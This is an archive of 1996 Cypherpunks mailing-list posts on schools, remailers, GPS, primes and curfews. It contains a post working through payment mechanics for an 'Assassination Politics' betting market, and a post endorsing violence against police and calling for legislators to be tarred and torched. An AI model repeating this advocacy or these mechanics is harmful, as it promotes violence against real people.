> = .It would also seem to > = .follow that if parents were spending their own money (or > = .perceived it as their own money) that they would take a greater > = .interest in their childrens education. > = . > ...if they were smart enough to start about age 3. the Better late than never. > themselves after dark. (I do admit that one good scream would > have an extremely well-armed about to be posse out the door in > 15 seconds... --I doubt there would be prisoners!) In my neighborhood, screams are so common (mostly from kids playing, and yes, I do check as often as I can) that most people don't bother to check. Very different worlds. My wife and I are probably the only ones who _don't_ watch TV. We have 2, plus 5 computers, and 5 or 6 book shelves. The TV's were free, so were 2 of the computers. > a very unusual situation --but I live in rural southern utah > where the regional middle school of 1200 can support 4 bands, the > freshman. and, where an average ward (100-150 families) will have > at least a dozen Eagle scouts. > proves your point, I guess... Prove? I don't know, but it is some pretty solid evidense. Communism at it's finest. A community of people who work together and take care of each other voluntarily for the common good. Petro, Christopher C. petro at suba.com snow at smoke.suba.com From snow at smoke.suba.com Sat Sep 28 22:01:01 1996 From: snow at smoke.suba.com (snow) Date: Sun, 29 Sep 1996 13:01:01 +0800 Subject: Making Remailers Widespread In-Reply-To: Message-ID: <199609290222.VAA00392@smoke.suba.com> KOTM said: > Bill Stewart writes: > > Doing two-way remailers would be better, but that's still a hard problem, > > and I don't want to widely deploy shoddy two-way-remailers. 
While IANAC, maybe a suggestion here (and there might be holes in this) when the email is sent to the remailer, it gets a key pair generated, and one of the keys is inserted into the header of the forwarded email like this: *****This is an anonymous message forwared from the spread remailer***** *****To reply to this message, send email with the following 4 lines**** *****as the first part of the message to: ***** =>replykey: snow at smoke.suba.com From snow at smoke.suba.com Sat Sep 28 22:05:35 1996 From: snow at smoke.suba.com (snow) Date: Sun, 29 Sep 1996 13:05:35 +0800 Subject: Workers, Public Schools, Tradesmen, and Justice In-Reply-To: Message-ID: <199609290126.UAA00307@smoke.suba.com> Mr. May said: > At 1:35 PM -0500 9/27/96, jbugden at smtplink.alis.ca wrote: > >If you want to refuse those who are too stupid or anti-social from Public > >Schools in order to improve the social or intellectual climate, you better > >have > >a solution for the resulting cast-offs. > > (And I reject any of the common arguments that Americans need to learn > history, the Constitution, etc. Few of them remember a single word they > learned, and one might as well teach the basics in earlier grades and > dispense with meaningless lectures about how and when the Senate may invoke > cloture, how the Foreign Powers Act modified the 1877 Trade Act, and so on.) I would assert that if children (ALL of them) had been thru a class in the Hows and Whys of the constitution, rather than the glossing over that I remember, our government would be a lot different. I am not talking about _just_ an intense memorization of the document, but a reading of the federalist papers (which I still haven't gotten all the way thru) and a month or two of purely discussing and analyzing the document, the Feds couldn't get away with what they are doing. 
I agree that students who aren't cut out for the academic life should be incouraged to persue trades, or the arts (which IMO are simply trades, and my degree will be a BFA when I finish that last Art History class) but citizenship is _everyones_ responsibility, and there are too many people clamoring for laws & amendments without thinking, and without understanding the process. Our schools are not turning out thinkers, and that is a (IMO) a fatal flaw. This is the OBCrypto part: For Crypto(in the sense of anonymity and pseudoanonymity) to truely be accepted and appreciated by the "general public (yes, a vague term), they need to understand the history of anonymous publications. They need to understand _why_ people should want to publish anonymously. The other side is that for your "crypto-anarchy" to succeed, we need people who can understand things like "algorythms" and "mathmatical proofs". The rest of this is [NOISE]. > As I look around me, here in Santa Cruz, I see hundreds of "homeless > persons.: We used to call them beggars, bums, panhandlers, winos, hobos, > and drifters. The people unwilling to get up in the morning for a boring > job, the people unwilling to take the donations they get and buy some new > clothes at the Salvation Army (I know people of both sexes who buy their > business clothes at thrift shops, at huge discounts, so I reject any of the > usual arguments that this won't work.) I have bought "work clothes"--collared shirts, trousers &etc--at SalAr, and my wife still does. She works for the Merc as a secretary. These many of these people are unwilling to do _anything_ to help themselves, and it is the fault of everyone who ever handed them a dime. As one former listmember ranted one day "You know why there are beggars in this city?"..."Because people like you (not me, his partner) GIVE THEM MONEY". People wouldn't beg if it got them nothing. 
> When I see people working at Taco Bell, Burger King, gas stations, etc., > and then I see the so-called "homeless," the situation is completely clear > to me. And, like pigeons, if you begin feeding the beggars, you'll have > more of them. Oops. You made that point. > For the last couple of weeks I've been hauling 70-pound stones to build a > retaining wall (don't ask me about the permits I should've gotten), ripping > up redwood deck boards, digging postholes for a new fence, and generally > doing a couple of hours of manual labor every day. While it has its > advantages, in earlier days I could've counted on providing some employment > for someone who today is "a homeless person." No more. They're not > psychologically prepared to do a solid (if unspectacular) job, as they've > been taught for all of their lives that they went through high school and > maybe a couple of years of college (and maybe more) so they could join the > professional ranks....when they see they really won't be joining the > professional ranks, and that they really don't want to make the sacrifices > to, they have nothing to fall back on. While I'd agree that this is true for many, I know some (me, my brother and a couple of my cousins) that have done work like this more than once. Not that I would do that kind of work (for pay) today, unless I was _real_ desperate. Then again, it could be a family thing. > get money. They won't get "entitlements" from the government (= taxpayers, > = those who are working, = me and thee). Tell them that a college education > should only be pursued if one has a "calling" to be an engineer, a > programmer (and probably not even that, judging by what I see), a doctor, a > lawyer (on second thought, don't ever suggest they become lawyers), and so > on. I see no reason that general programming shouldn't be considered a trade. Maybe more "pure" math than a carpenter, or a mechanic, but they don't need the english, general history, & etc. 
that other "academic" careers need. > And make it easier to hire people, instead of harder. (And if one hires a > maid, and the maid steals, cut off her hand. We've lost sight of justice, > and people think that ripping off the rich is their kind of justice. This > needs to change.) Cutting off hands is a little drastic. Too prone to false aqusations, and too hard to erase if the courts are wrong. Three years at hard labor on bare sustance would be about right tho', and if the aqusation is proved false, it is erase from the record. > This is why crypto anarchy's starving of the tax system is good. It may > "kill" some number of people, as nearly any new idea does, but ultimately > it will put things back on track. People die for all manner of reasons every day. Fuck'em. Petro, Christopher C. petro at suba.com snow at smoke.suba.com From themom at nando.net Sat Sep 28 22:39:32 1996 From: themom at nando.net (themom) Date: Sun, 29 Sep 1996 13:39:32 +0800 Subject: Public Schools In-Reply-To: Message-ID: I have to agree with the final Quote....I am Good in math, chemistry and computer science I am good in any Logical cource but I have trouble in places liek " Creative Writing" I take all AP cources and make A's and B every now and again in english...I have a 3.7 gpa but a LOW sat in the grammar and english sections, 1100 in all I don't think colleges should look at the subjects you dont plan to major in...I plan to major in computer science when I go to college, so I dont think they should look so much at say english, or biology. 
I get so frustrated in some of those classes....BTW I am a Junior in highschool Brent On Sat, 28 Sep 1996, The Deviant wrote: > On Fri, 27 Sep 1996, snow wrote: > > > Date: Fri, 27 Sep 1996 20:09:36 -0500 (CDT) > > From: snow > > To: jbugden at smtplink.alis.ca > > Cc: cypherpunks at toad.com > > Subject: Re: Public Schools > > > > James said: > > > ronsimpson at unidial.com wrote: > > > >I hate to burst any bubbles but, the school with the highest number > > > > of National Merit Finalists and highest number of 1600 SATs is a=20 > > > > Public High School (Jefferson High in Fairfax, VA) > > > The same is true for Montreal (Royal Vale) using the equivalent scoring methods. > > > But there are public schools at both extremes of the curve. > > > While it is true that Private Schools would not survive due to market forces if > > > they did consistently poorly, it is also true that they filter their incoming > > > student body in a manner that Public Schools can not. > > > If you want to refuse those who are too stupid or anti-social from Public > > > Schools in order to improve the social or intellectual climate, you better have > > > a solution for the resulting cast-offs. > > > > There is a solution. Trade Schools, and Parental Envolvement. It could > > very well be (and if I had the money I'd make the bet) that _many_ of the > > "troubled" youth of today are simply undisiplined. (Fortunately, most of > > them couldn't afford to bet against their parents in an AP world). It would > > also seem to follow that if parents were spending their own money (or > > perceived it as their own money) that they would take a greater interest in > > their childrens education. > > > > For those that are truly not scholastically oreinted, there would be > > trade schools. I would also bet that you could teach a child everything they > > need to learn (other than a trade) to cope in this world in about 4 years. > > > > But now we must make a disinction... 
I'm LD in writing, but can read very > well (when I was in 6th grade I could read like a 10th grader), and do > very well in Math and Computer classes (and non-biological/anatomical > sciences). So should I be in trade school, because I plan on being a > computer programmer, or go to college? Sure, I don't do well in language > and (depending on the class) some history classes, which, IMHO, are > weighted more heavily than they should be in both public _and_ private > schools (and yes, I've been to both), but I don't think that should mean I > can't go to college... > > Anyway, my point is that there is, at times, a very fine line... > > --Deviant > When we write programs that "learn", it turns out we do and they don't. > > From hallyn at cs.wm.edu Sat Sep 28 22:56:01 1996 From: hallyn at cs.wm.edu (Serge E. Hallyn) Date: Sun, 29 Sep 1996 13:56:01 +0800 Subject: sophie germain primes Message-ID: <199609290344.XAA05661@astro.cs.wm.edu> Could anyone direct me to an online list of small (less than 800-digit) Sophie Germain primes? (actually any list would do) many thanks, -serge hallyn at cs.wm.edu From stewarts at ix.netcom.com Sat Sep 28 22:59:26 1996 From: stewarts at ix.netcom.com (Bill Stewart) Date: Sun, 29 Sep 1996 13:59:26 +0800 Subject: GPS Message-ID: <199609290407.VAA20249@dfw-ix3.ix.netcom.com> >2. The DoD is doing a study right now on how to make GPS useless to the >enemy at wartime. >I think figuring out a way to turn off A/S and getting accurate GPS on >commercial equipment at all times would make a nifty Cypherpunks project >- if it really involves breaking some encryption. Essentially the A/S works by having the publicly-readable signal contain fuzz fuzz in the low-order bits and the encrypted signal contain the real stuff; if they've done decent encryption, you won't crack it. 
However, the fuzz _is_ consistent - if you've got two nearby points, and you really know where one of them is, you can correct for it, and get better accuracy even than the full GPS with A/S turned off. The approach the Feds are taking to prevent competition from real differential GPS is to field a differential GPS system of their own, located at/near airports (who are the real people who want D-GPS, so they can do things like better instrumented or automated landings.) This way, nobody's got much financial incentive to deploy D-GPS correction transmitters of their own, and manufacturers have an incentive to deploy equipment tuned to the FAA's correction transmitters, so they can still turn them off if they want to. Except for takeoff/landing, airplanes don't much need differential GPS; you shouldn't be flying within a hundred meters of other planes anyway, and if you're doing cropdusting or barnstorming you'd better be able to see what you're doing or have good radar anyway - most topographic maps don't have tall trees marked on them. # Thanks; Bill # Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com # # You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto From rwright at adnetsol.com Sat Sep 28 23:24:10 1996 From: rwright at adnetsol.com (Ross Wright) Date: Sun, 29 Sep 1996 14:24:10 +0800 Subject: sophie germain primes Message-ID: <199609290436.VAA16148@adnetsol.adnetsol.com> Sir: Lot's of stuff on primes, right here: http://daisy.uwaterloo.ca/~alopez-o/math-faq/node10.html Hope it helps. On or About 28 Sep 96 at 23:44, Serge E. Hallyn wrote: > Could anyone direct me to an online list of small (less than 800-digit) > Sophie Germain primes? 
> > (actually any list would do) > > many thanks, > -serge > > hallyn at cs.wm.edu > > =-=-=-=-=-=- Ross Wright King Media: Bulk Sales of Software Media and Duplication Services http://www.slip.net/~cdr/kingmedia Voice: 415-206-9906 From attila at primenet.com Sat Sep 28 23:25:54 1996 From: attila at primenet.com (attila) Date: Sun, 29 Sep 1996 14:25:54 +0800 Subject: Public Schools In-Reply-To: <199609290153.UAA00354@smoke.suba.com> Message-ID: <199609290418.WAA23501@infowest.com> In <199609290153.UAA00354 at smoke.suba.com>, on 09/28/96 at 08:53 PM, snow said: A person going by the name Attila said: > There is a solution. Trade Schools, > The problem was simple: we have only the now retiring >toolmakers who make it all possible. engineering graduates will not >not observe the manufacturing floors since it is above their >dignity to roll of their sleeves. I knew too many engineering students to believe this. I knew one (Civil Engineering) who had been a Paramedic, he wanted grease and dirt on his hands, it may be harder to wash off, but much easier to sleep off. he's the exception, not the rule. I paid my way through Harvard as a tool and die maker --if the engineers had to make some of the crap they designed, they would design them that way again. > if engineers were required to serve internships in the shops, >as doctors are required to intern in a hospital (and the really good >ones, the top of the class, choose what I call meat-wagon wards >(large city ER and trauma units), the U.S. would be a far healthier >and competitive environment. No argument there. > I know, why the meat wagon wards with their pressure and >unreasonable hours? experience, anything and everything comes >through those doors every night, and it goes off the scale on the >weekends... Hell, that desciribes the ER I used to work in, and it was in a college town. (Yes, I do have a sorted job history. Everything from a strip joint dj. to working as a designer for a Big 7 Accounting firm). 
> It would also seem to > follow that if parents were spending their own money (or > perceived it as their own money) that they would take a greater > interest in their childrens education. > =. > ...if they were smart enough to start about age 3. the Better late than never. unfortunately, the conservative child care people believe the pattern may be irretrievably set by the age is six. you need to start with the child from the gate with the nuture --reduces fear of abandonment, &c. and encourage trust so they will go to others without a tantrum, &c. President Hillary, of course, believes in *her* global village with *her* central government dictating for all --community raising a generation of raison heads! --from day 1! > themselves after dark. (I do admit that one good scream would >have an extremely well-armed about to be posse out the door in 15 >seconds or less... --and, I doubt there would be prisoners!) you want a concealed weapon permit? --just go register. In my neighborhood, screams are so common (mostly from kids playing, and yes, I do check as often as I can) that most people don't bother to check. a scream of terror is a different scream. besides, we have 6 families in our 8-10 acre section --33 kids between us. and our air raid siren would be howling like an inbound kamikaze. Very different worlds. My wife and I are probably the only ones who _don't_ watch TV. We have 2, plus 5 computers, and 5 or 6 book shelves. The TV's were free, so were 2 of the computers. we're light on computers at the moment --only 3, and I need 3 more. bookshelves? 30 feet, floor to ceiling, packed. trying save enough to get one of the 7 CD rom up in parallel deals for the 8G freeBSD fileserver --OS/2 (merlin) workstations. stuff is expensive, even when you buy right. well, out here, probably 20% of the families did not have a TV; I gave the "message" one Sunday a couple months ago and the percentage has gone up. 
those who did have TVs have them severely restricted for content --there are no R movies tolerated --and most do not bring in a commercial signal --VCRs. the population base is changing with an influx of non-Mormons in town, so R rated are showing up at the theatres and video rentals in town. the police visible prescence is effective --a force of 50+ for a population base < 25,000, plus the county sherrif cars and the state police. Curfew is 10pm weekdays for minors --and they enforce it, big time. midnight Fri/Sat. > a very unusual situation --but I live in rural southern utah >where the regional middle school of 1200 can support 4 bands, > >and, where an average ward (100-150 families) will have at >least a dozen Eagle scouts. > proves your point, I guess... ...idle hands are the devil's workshop. you want good solid kids, you start from the gate and keep 'em busy: home, neighbors, school, church, etc. yes, you work hard for it --every day. I have 5, and it can be a real task with internecine warfare and all that good stuff. It starts at home and goes the route. there is no dead time on a streetcorner, or at friends house without a parent home. they do not date until they are 16 --in groups. boys and girls --the same rules.  Prove? I don't know, but it is some pretty solid evidense. Communism at it's finest. A community of people who work together and take care of each other voluntarily for the common good. good thing you added the --half redneck republicans --half further right clinton, let alone communism, is a fighting word.... conspiracy theory is live and well. as far as anyone around here is concerned, Waco and Ruby Ridge were to establish a need for gun control, militia bans, privacy abridgements, CDA, crypto bans, &c. opinion on the government in the midst of OKC and TWA is moving into the positive range --and there is absolutely no doubt of Bubba's cocaine habit or the stink of Mena airport. 
BTW, the education level is way above the national average; not very many dummies out here. we do have an advantage: BYU is $3K/semester for LDS members, and you need 3.7 to 4.0 to get in. schools --if YOU don't support them, you and we don't have them! -- "God forbid we should ever be 20 years without such a rebellion. . . . What country can preserve it's liberties if their rulers are not warned from time to time that their people preserve the spirit of resistance?. . .The tree of liberty must be refreshed from time to time with the blood of patriots and tyrants." --Thomas Jefferson, regarding anarchy. From stewarts at ix.netcom.com Sat Sep 28 23:28:42 1996 From: stewarts at ix.netcom.com (Bill Stewart) Date: Sun, 29 Sep 1996 14:28:42 +0800 Subject: Technical difficulties with AP [AP NOISE] Message-ID: <199609290407.VAA20253@dfw-ix3.ix.netcom.com> Aside from details like dead bodies, vendettas, and government suppression, there are technical complications with Assassination Politics that make it more than the simple job Jim Bell is imagining. Some of them provide ways to defend against AP, and turn it into more like Extortion Politics. [Do I _really_ want to bring up more discussion of AP? Not sure, but if it's clear that it won't work very well, it'll be less likely for the government media to freak about :-)] Let's look at the critical part of the problem - paying the assassin. The model we've generally been using is that the players are the victim, the escrow agent who manages the system, an enthusiastic public, and the assassin or assassins who are competing for the jackpot. I can see three approaches to identifying the correct payee: 1) Payee provides physical evidence to the escrow agent - the traditional approach doesn't work here: since the escrow agent is anonymous, so you can't mail him the victim's wallet or finger with well-known fingerprint or whatever. 
2) Assassin leaves physical evidence at the scene which the news media would be likely to report, which payee confirms with escrow agent, presumably committing in advance (e.g. after the event, the payee sends a key which allows the escrow agent to decode the encrypted message that said "I'm leaving a note on the body saying 'Jacques De Molay is Avenged - Assassin's Guild Member #32767'.") Works fine for the first couple of assassinations, but after a while the police will catch on and stop revealing kinky details to the media. 3) The main solution has been the gambling deal - it's just a lottery on the date of death of the victim, which presumably the payee will win because he knows when the assassin will strike. For a lottery to be effective, prospective assassins need to be able to determine how much the jackpot is and who the victim is, so they can place their bets and be the closest winner. But the prospective victim can also play, individually or as part of an insurance pool (which is especially valuable for victims like "the first IRS agent to be assassinated".) Obviously you don't want to just bid up the price on your own head, so it needs to be accompanied by publicity that the IRS Agents' Benevolent Association is placing a large number of small bets every day to maximize the chances that _they_ will collect the money rather than the assassins. If the times that the bets are for are published, you can beat this, but you also invite speculators to be small bets just before and after your bets, so it becomes a mishmash and perhaps a race condition. If the times aren't published, the assassin can make lots of bets surrounding the planned date of the hit, which is also a warning to the prospective victim to be careful if the bets on his demise start increasing rapidly. This does make the AP lottery somewhat of an extortion deal - by advertising that someone is a target, you're forcing them to continually make lots of bets. 
But if they've got any way of tracing money, even partially, it'll help them find the escrow agent, who can then be targeted for justice of one sort or another. You're also forcing the assassin to make lots of bets, though in a jackpot system the successful payee will recover most of it. To some extent the defense can be fought if the escrow agent wants to establish a minimum bet, say $100, which an assassin can afford to make a few of for the targeted day, but the victim can't keep paying too much. This also reduces the since of the potential better pool, and therefore reduces the jackpot and the attractiveness of the job to the assassin. Lots of people might be willing to spend $5 to contribute; $100 bets are much fewer, especially if there are enough targets to successfully overthrow a government. # Thanks; Bill # Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com # # You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto From stewarts at ix.netcom.com Sat Sep 28 23:30:55 1996 From: stewarts at ix.netcom.com (Bill Stewart) Date: Sun, 29 Sep 1996 14:30:55 +0800 Subject: [NOT NOISE] Jena Remailer Message-ID: <199609290412.VAA20552@dfw-ix3.ix.netcom.com> At 04:10 PM 9/28/96 -0700, anonymous wrote: >My first thought was to have them sent to a non-autopinging *.test ng >via a well-tested parsing mail2news gate, but some autopingers ping ALL >*.test traffic passing through a site. If these ping messages didn't >get automatically bitbucketed at the remailer site, this could be a >problem for the operator. Most of the autopingers will ignore messages with "ignore" in the Subject: line. 
# Thanks; Bill # Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com # # You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto From attila at primenet.com Sat Sep 28 23:41:59 1996 From: attila at primenet.com (attila) Date: Sun, 29 Sep 1996 14:41:59 +0800 Subject: active practice in America In-Reply-To: <199609290133.UAA00319@smoke.suba.com> Message-ID: <199609290438.WAA23813@infowest.com> In <199609290133.UAA00319 at smoke.suba.com>, on 09/28/96 at 08:33 PM, snow said: A Person going by the name Attila said: > to put it another way: in criminal proceedings: I would rather >be considered guilty, until proven innocent; than I would be >presumed innocent, until proven guilty beyond a reasonable doubt.  If you were the person being _tried_ for a crime, you would rather have to prove that you COULDN'T POSSIBLY have committed the crime as opposed to having to have the government PROVE that you DID DO it?  you bet --the objective of the defense is to cast aspersions on the government prosecutors --in other words, create that doubt. you do not need to prove your innocence unconditionally, just "taint" the prosecutor a bit. however, in many cases you are guaranteed a trial by a jury of your peers. as for peers --look at OJ, and the reverse weighting of the Santa Monica jury v. downtown. > a nation which can base a conviction on conspiracy to commit a >crime, or permits circumstantial evidence to close the gap towards >'beyond a reasonable doubt,' has lost any pretense of understanding > the heritage of common law: the Magna Carta.  Of that, there is no denying. the example I have always used: three men were drinking in a bar across the street from a ripe looking bank. they sit there and plot a knockoff. one gets stinking drunk and passes out on the floor. the other two go across the street to be arrested for the attempted heist. the police arrest the drunk on the floor. why? "conspiracy to commit the crime!"
and the penalty is the same: 7-20 years in the federal slam. --unless you are socially disadvantaged and claim heroin addiction; then you make it to the street in as little as 18 months and wipe the tail within 7 years, not 20. the rule was the offender must be less than 25, it may have been raised. or, you could hire an expensive member of the boys' club and might trade someone elses body for your freedom.... that's justice in Amerika, folks! you like it, right? From Adamsc at io-online.com Sun Sep 29 00:33:11 1996 From: Adamsc at io-online.com (Adamsc) Date: Sun, 29 Sep 1996 15:33:11 +0800 Subject: Public Schools Message-ID: <19960929052112562.AAH154@GIGANTE> On Fri, 27 Sep 1996 09:22:05 -0400, ronsimpson wrote: >I hate to burst any bubbles but, the school with the highest number of >National Merit Finalists and highest number of 1600 SATs is a Public >High School (Jefferson High in Fairfax, VA) This probably just means that they have a good SAT cram course. Ditto for the NMS. I've run into people who've done well on the SATs and have been rather underwhelmed. In my opinion it's like MIPS: Meaningless Indicator # Chris Adams | http://www.io-online.com/adamsc/adamsc.htp # | send mail with subject "send PGPKEY" "That's our advantage at Microsoft; we set the standards and we can change them." --- Karen Hargrove, Microsoft (quoted in the Feb 1993 Unix Review editorial) From tcmay at got.net Sun Sep 29 00:50:27 1996 From: tcmay at got.net (Timothy C. May) Date: Sun, 29 Sep 1996 15:50:27 +0800 Subject: Utah as a Religious Police State In-Reply-To: <199609290153.UAA00354@smoke.suba.com> Message-ID: Hey, Attila, let me know where you folks live...I may want to move there! At 2:56 AM +0000 9/29/96, attila wrote: > the population base is changing with an influx of non-Mormons > in town, so R rated are showing up at the theatres and video > rentals in town. 
Just so long as my DSS dish still works in Utah--hey, I'll invite all the jack Mormons over for tomorrow night's showing of "Inside Janine," on the "Playboy Channel." (The "Playboy Channel" is kind of tame by video rental standards, but more crotch shots than we used to see a couple of years ago.) > the police visible prescence is effective --a force of 50+ for > a population base < 25,000, plus the county sherrif cars and the > state police. Curfew is 10pm weekdays for minors --and they > enforce it, big time. midnight Fri/Sat. They enforce the "curfew" big time? Looks like some Mormon pigs need to be zapped. (My kids don't cotton to no cop telling them when they can be out in public and when they can't. Any cop who tries to stop my kids from being out has earned severe retaliation. Any councilmember or state legislator who voted for such a curfew needs to be hog-tied, covered with tar, then torched.) I guess this is why I wouldn't last very long in Mormon Country. A fascist encampment, it sounds like. (I have no problem with Mormons, or Catholics, or Muslims, or Satanists keeping _their own_ children indoors after 7, or 5, or whatever their Holy Hour or Curfew Hour is, but no fucking religious nuts are going to tell _me_ when _my_ children must be indoors. I determine where my children may be, and I don't need the State's permission for them to be out. I would think anyone with an iota of libertarian sentiment would understand this.) > ...idle hands are the devil's workshop. you want good solid > kids, you start from the gate and keep 'em busy: home, neighbors, > school, church, etc. Do Utah's cops also enforce this law, too? > they do not date until they are 16 --in groups. boys and > girls --the same rules. With the Utah State Police enforcing this "dating curfew"? (I may sound harsh here, but "curfew" means one and only one thing to me: somebody restricting my freedom of those of my children to be a public place. 
Should one of my children be picked up by cops for doing nothing illegal, save for being "out past curfew," I'd consider violent response to be justified. It sounds to me--not that I ever thought otherwise--that Utah is not a land that favors liberty.) --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From shamrock at netcom.com Sun Sep 29 00:56:47 1996 From: shamrock at netcom.com (Lucky Green) Date: Sun, 29 Sep 1996 15:56:47 +0800 Subject: GPS In-Reply-To: <199609290407.VAA20249@dfw-ix3.ix.netcom.com> Message-ID: On Sat, 28 Sep 1996, Bill Stewart wrote: [Quoting sombody else] > >2. The DoD is doing a study right now on how to make GPS useless to the > >enemy at wartime. > >I think figuring out a way to turn off A/S and getting accurate GPS on > >commercial equipment at all times would make a nifty Cypherpunks project > >- if it really involves breaking some encryption. [...] > Except for takeoff/landing, airplanes don't much need differential GPS; > you shouldn't be flying within a hundred meters of other planes anyway, > and if you're doing cropdusting or barnstorming you'd better be able > to see what you're doing or have good radar anyway - most topographic > maps don't have tall trees marked on them. It may be considerably more than 100 meters if you have the ill fortune to get caught in one of the GPS jamming tests the Air Force is currently conducting. 
AOPA Pilot reports in their September issue that only now the Air Force has at least agreed to classify their GPS-ECM (Electronic Countermeasures) as distance notams, meaning they'll warn pilots in advance. Anyway, encryption has nothing to do with these ECM. --Lucky From Adamsc at io-online.com Sun Sep 29 01:02:58 1996 From: Adamsc at io-online.com (Adamsc) Date: Sun, 29 Sep 1996 16:02:58 +0800 Subject: Public Schools Message-ID: <19960929054253390.AAA193@GIGANTE> On Fri, 27 Sep 1996 09:20:10 -0800, Timothy C. May wrote: >(Seriously, my view is that schools are not very important. All success, >academic or technical, derives from one basic determining factor: those who I always liked Robert Heinlein's comment: "It's possible to get a good education anywhere, if you are willing to work for it". Unfortunately not many people want to work for anything... >read for pleasure, succeed, and those who don't read for pleasure, don't. ++agree. >taught usable trades. Seriously. Our "ideal" that all children should >attend college is absurd, given the lack of academic preparation, desire, >and reading skills that so many high school students lack. Most community Not only that, what are all these college grads going to do? Only a small percentage are going to be making waves in a given field. Many are just going to lower the overall average... Worse yet, many become lawyers. A society with such a high percentage of parasites (those who don't add value sufficient to cover expenses) isn't healthy. >colleges are essentially becoming Grades 13-14, with most of the Grade Why are they going to college? Well they weren't learning it in HS. They did however learn to feel good about themselves, use a condom and handle complex social situations (see: gossip. Or, for the average guy, see: wedgie). What use this serves is an excellent question. >13-14 students reading at the 9th-grade level (which most of us on this >list were reading at when we were in the 7th-grade, or earlier).)
That's putting it mildly. . . I read 200+ pages/hour with a very high retention rate. Needless to say, this means I move through books at high speed. Quite a few times I've had the experience of summarizing a "Great Work" to a college-educated teacher. Almost scary. Equally bad are the people who read but do not understand. The term functionally illiterate comes to mind. We may joke that people switch into "Idiot Mode" (Apologies to the BOFH author) around computers but I've run into a number of people who are apparently stuck in it. # Chris Adams | http://www.io-online.com/adamsc/adamsc.htp # | send mail with subject "send PGPKEY" "That's our advantage at Microsoft; we set the standards and we can change them." --- Karen Hargrove, Microsoft (quoted in the Feb 1993 Unix Review editorial) From Adamsc at io-online.com Sun Sep 29 01:05:23 1996 From: Adamsc at io-online.com (Adamsc) Date: Sun, 29 Sep 1996 16:05:23 +0800 Subject: Workers, Public Schools, Tradesmen, and Justice Message-ID: <19960929055435234.AAA224@GIGANTE> On Fri, 27 Sep 1996 13:01:13 -0800, Timothy C. May wrote: >My conclusion is simple: Tell people if they don't work, they won't eat. If >they do something others are willing to give them money to do, they won't >get money. They won't get "entitlements" from the government (= taxpayers, >= those who are working, = me and thee). Tell them that a college education >should only be pursued if one has a "calling" to be an engineer, a >programmer (and probably not even that, judging by what I see), a doctor, a I've noticed that many places are concerned more with things like creativity, adapability, drive, etc when hiring a CS grad. I've found that having a resume that shows these kind of traits well overcame the lack of a degree (I'm working on that). There was a thread about this in comp.lang.cobol awhile back. >lawyer (on second thought, don't ever suggest they become lawyers), and so >on. 
The old way was that your HS provided what the mythical average person needed to go about life. College was for the more "complex" careers. >And make it easier to hire people, instead of harder. (And if one hires a >maid, and the maid steals, cut off her hand. We've lost sight of justice, >and people think that ripping off the rich is their kind of justice. This >needs to change.) You don't even need to be that harsh. Chain-gang work to pay off stolen property would be more effective, if for no reason other than that you'd get your money (or property) back. >Psychologists and similar psychobabblers call it "tough love." If one >always "enables" an addict, a layabout, a shiftless worker, with excuses >and handouts, the behavior does not change. To save a person, sometimes >harshness is needed. >This is why crypto anarchy's starving of the tax system is good. It may >"kill" some number of people, as nearly any new idea does, but ultimately >it will put things back on track. And you have to look at it from another point of view: If it would ameliorate the problems in the future for the majority of the population, it'd be worth a bit of discomfort now. # Chris Adams | http://www.io-online.com/adamsc/adamsc.htp # | send mail with subject "send PGPKEY" "That's our advantage at Microsoft; we set the standards and we can change them." --- Karen Hargrove, Microsoft (quoted in the Feb 1993 Unix Review editorial) From Adamsc at io-online.com Sun Sep 29 01:19:23 1996 From: Adamsc at io-online.com (Adamsc) Date: Sun, 29 Sep 1996 16:19:23 +0800 Subject: Public Schools Message-ID: <19960929061014609.AAA180@GIGANTE> On Fri, 27 Sep 1996 22:36:57 -0800, Timothy C. May wrote: >> a very unusual situation --but I live in rural southern utah >> where the regional middle school of 1200 can support 4 bands, the >> top 2 being very impressive, and provide full AP classes, and ACT >Wow! Utah is teaching AP? Is Jim Bell being brought in as a Special Lecturer? 
>(I knew Idaho has special Militia classes, but to hear that Utah is now >teaching Assassination Politics is pretty impressive.) Now, ignoring the humorous parts, wouldn't that be a scary thought? Pro-AP high school students? I could just imagine the death toll rising as the "popular" students are knocked off by jealous rivals, as the dumped [boy/girl]friend gets even, etc. It'd be hard for any non-homeschooled student to live to 18. # Chris Adams | http://www.io-online.com/adamsc/adamsc.htp # | send mail with subject "send PGPKEY" "That's our advantage at Microsoft; we set the standards and we can change them." --- Karen Hargrove, Microsoft (quoted in the Feb 1993 Unix Review editorial)
From stewarts at ix.netcom.com Sun Sep 29 01:22:16 1996 From: stewarts at ix.netcom.com (Bill Stewart) Date: Sun, 29 Sep 1996 16:22:16 +0800 Subject: Making Remailers Widespread Message-ID: <199609290623.XAA25627@dfw-ix3.ix.netcom.com> At 01:06 PM 9/28/96 -0400, "Mark M." wrote: >Since maintaining a block list is probably one of the most time-consuming tasks >involved with operating a remailer, it would be a Good Thing to add an option >to the remailer cgi program to operate as a "middleman" remailer. This would >only require the remailer operator to add or remove entries from a list of >allowed destinations. The operator wouldn't have to deal with disclaimers and >would only receive complaints from other operators if the remailer is >malfunctioning in some way. That's another good approach, though a second-string objective compared to having full-scale terminal remailers running everywhere. But it's clearly a strong fallback position, and might be easier to get people to adopt and not turn off. It does depend on the availability of a list of working remailers with the correct feature sets, plus adequate distribution of either PGP keys or some S/MIME-related equivalent. One way to do that is to parse Raph's list appropriately (and check signatures on that); another is to have some centralized (sigh) DNS server do a round-robin distribution so that random.remailer.net picks a random known-good remailer to deliver through, perhaps also delivering a PGP key. I'd far prefer a distributed solution, but this does let people volunteer to take heat for a little while and dispose of their remailers if they have to. In particular, it may be useful for winsock remailers that are willing to connect up and be a delivery remailer when they're connected and disconnect when they're unavailable.
